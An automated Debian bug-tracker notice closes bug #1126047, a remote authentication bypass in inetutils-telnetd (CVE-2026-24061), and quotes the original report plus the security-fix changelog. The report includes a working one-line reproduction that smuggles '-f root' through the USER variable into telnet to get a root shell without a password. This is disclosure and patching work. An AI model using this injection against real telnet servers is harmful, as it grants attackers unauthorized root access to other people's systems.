Your message dated Sat, 24 Jan 2026 11:34:11 +0000
with message-id <[email protected]>
and subject line Bug#1126047: fixed in inetutils 2:2.4-2+deb12u2
has caused the Debian Bug report #1126047,
regarding inetutils-telnetd: remote authentication bypass (CVE-2026-24061)
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
1126047: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126047
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: inetutils-telnetd
Version: 2:2.7-1
Severity: grave
Justification: user security hole
From
https://seclists.org/oss-sec/2026/q1/89
root@kaka:~ sudo apt-get install inetutils-telnetd telnet
root@kaka:~ sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
root@kaka:~ sudo /etc/init.d/inetutils-inetd start
root@kaka:~ USER='-f root' telnet -a localhost
...
root@kaka:~#
-- System Information:
Debian Release: forky/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Kernel: Linux 6.17.13+deb14-amd64 (SMP w/12 CPU threads; PREEMPT)
Locale: LANG=en_CA.UTF-8, LC_CTYPE=en_CA.UTF-8 (charmap=UTF-8),
LANGUAGE=en_CA:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages inetutils-telnetd depends on:
pn inetutils-inetd | inet-superserver <none>
ii libc6 2.42-9
ii libcom-err2 1.47.2-3+b8
ii libk5crypto3 1.22.1-2
ii libkrb5-3 1.22.1-2
ii libtinfo6 6.6+20251231-1
ii login 1:4.16.0-2+really2.41.3-2
ii netbase 6.5
ii systemd-sysv 259-1
inetutils-telnetd recommends no packages.
inetutils-telnetd suggests no packages.
--- End Message ---
--- Begin Message ---
Source: inetutils
Source-Version: 2:2.4-2+deb12u2
Done: Guillem Jover <[email protected]>
We believe that the bug you reported is fixed in the latest version of
inetutils, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Guillem Jover <[email protected]> (supplier of updated inetutils package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Wed, 21 Jan 2026 17:42:52 +0100
Source: inetutils
Architecture: source
Version: 2:2.4-2+deb12u2
Distribution: bookworm-security
Urgency: high
Maintainer: Guillem Jover <[email protected]>
Changed-By: Guillem Jover <[email protected]>
Closes: 1126047
Changes:
inetutils (2:2.4-2+deb12u2) bookworm-security; urgency=high
.
* Fix remote authentication bypass in telnetd.
GNU InetUtils Security Advisory:
<https://lists.gnu.org/archive/html/bug-inetutils/2026-01/msg00004.html>
Fixes CVE-2026-24061. (Closes: #1126047)
Checksums-Sha1:
0ae73c969708615fe098e9b56b98e752fa91b8e9 3226 inetutils_2.4-2+deb12u2.dsc
df64dd4ea0e752a839dd51dd8a6a001c9c7d1e96 1558308 inetutils_2.4.orig.tar.xz
3c1a7cdbb6b341942e28e663e9296efec298faba 228 inetutils_2.4.orig.tar.xz.asc
82401eb1b06189f9786acbc084a09362f0deacb3 81924
inetutils_2.4-2+deb12u2.debian.tar.xz
7ba06244ea19ded1713cc98f5ed171ee831eb499 13963
inetutils_2.4-2+deb12u2_amd64.buildinfo
Checksums-Sha256:
f7f8d28a4b2bb5adf5822b96466a1847c1ffa7d28a0ca3838817c7b77a3cb927 3226
inetutils_2.4-2+deb12u2.dsc
1789d6b1b1a57dfe2a7ab7b533ee9f5dfd9cbf5b59bb1bb3c2612ed08d0f68b2 1558308
inetutils_2.4.orig.tar.xz
5453c3407a380c7d79f09e644533aeff90c89bda53c41b77f97c7ffa827b3eb2 228
inetutils_2.4.orig.tar.xz.asc
2de50ac5bea81c60b08d410fea085a741ab3701a18812271e22b3e4fd7877802 81924
inetutils_2.4-2+deb12u2.debian.tar.xz
122f0d469601c85b3a8ed26da15605462e00371e7ccf8f08a16ac1df5907146a 13963
inetutils_2.4-2+deb12u2_amd64.buildinfo
Files:
abba6ef5c713fcc770b7a7a2528b564e 3226 net optional inetutils_2.4-2+deb12u2.dsc
319d65bb5a6f1847c4810651f3b4ba74 1558308 net optional inetutils_2.4.orig.tar.xz
278812e1abfa9580ebc565dbb430a56b 228 net optional inetutils_2.4.orig.tar.xz.asc
aef2d6fe07ab1398f98220abb8dc7e86 81924 net optional
inetutils_2.4-2+deb12u2.debian.tar.xz
d23ea310644781335db98a7008192f5e 13963 net optional
inetutils_2.4-2+deb12u2_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
wsG7BAEBCgBvBYJpcR5TCRC5cr8+pK5Xo0cUAAAAAAAeACBzYWx0QG5vdGF0aW9u
cy5zZXF1b2lhLXBncC5vcmccEMdBIoatQMOwgT9HObEF92BqtaKPDcbp3aIpGSnf
hBYhBE8+dPQ2BQwQ9WlldLlyvz6krlejAADfOhAAm+jz2E6WFx5s1nIwGpEOv0Ka
1YaAWe47pL3Bkv+1pfLxzbxKsNIrqqcScaHy+tc0qBC0rZLt1cq173aiw9Fvrp5l
RMMBB48pFC/mXpGo4rbCg+tw3gCFo568iRqDKVpii11iWIMPWBAREKa4IEgwrnzm
mD7lRPfbQtZYKY8gxOZVbk52ALoYk1E9v2k4fM5kAmq0doXcQR36SCwrQNbBWlSV
PqGrw6QY52U2gwuljTSC/iw28Snz2iXGGyLyKdJ5pcl3OZw6lUgHXNdeG8niSjt8
GHZY/ehlg/2W8Ppj5scVlyCLW/j6zhCnHT1qkM4aWOBOyu985V3urYA8mw2izTYk
lrKroAmfNvVCRgT1dWo1aSTUotP9GlNw0lsbAICYS440tbScpaaEI8xdnVJ5Aoln
SEDob0jnyjCqoLZfpXQ2+LK79qsJp+tMhLww5r86kNumQ0fI1XPIRDiColSS42IL
q8URLcLMT0wg9/+sTeLEM0sAFXejFnraA579r7ZYZOO6byFsiY+tVdIoxtA7SNfQ
GxiuuC0KQdHQuhGfYKclDrgzTiMftIrSA6hrxjbSudS9oo6+Nbn/+mwHfOlKbehP
vVh8XkkwllGDeOlrzDk7ixCjkVZOb4NEuuXICQcCAR0C7qAgNcvbCl2AuYITC7XT
DCb+tVviPiNuqGBJP0Q=
=mZ7R
-----END PGP SIGNATURE-----
pgpfkMjus67y7.pgp
Description: PGP signature
--- End Message ---
